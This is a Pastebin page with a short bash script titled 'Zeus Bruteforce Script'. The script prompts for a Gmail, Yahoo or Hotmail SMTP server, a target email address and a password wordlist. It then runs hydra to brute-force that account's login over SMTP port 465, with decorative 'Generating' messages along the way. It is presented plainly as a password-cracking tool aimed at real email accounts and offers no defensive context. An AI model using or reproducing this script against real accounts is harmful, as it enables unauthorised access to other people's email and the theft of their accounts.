Advertisement
Ov3rxRide

Zeus Bruteforce Script

Nov 17th, 2016
365
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.62 KB | None | 0 0
  1. #Note you Must have hydra installed, use:   sudo apt-get install hydra hydra-gtk
  2.  
  3.  
  4.  
  5. #! /bin/bash
  6.  
  7. echo Welcome to Zeus
  8. sleep 1s
  9. echo Written By: Ov3rxRide
  10. echo NOTE: You need a wordlist obviously!
  11. echo Powering Up:
  12. sleep 3s
  13. echo Starting:
  14. sleep 3s
  15. echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
  16. read smtp
  17. echo Enter Email Address:
  18. read email
  19. echo Provide Directory of Wordlist for Passwords:
  20. read wordlist
  21. echo Generating:
  22. sleep 3s
  23. echo Generated
  24. sleep 1s
  25. echo Thank you for using Zeus
  26.  
  27. hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement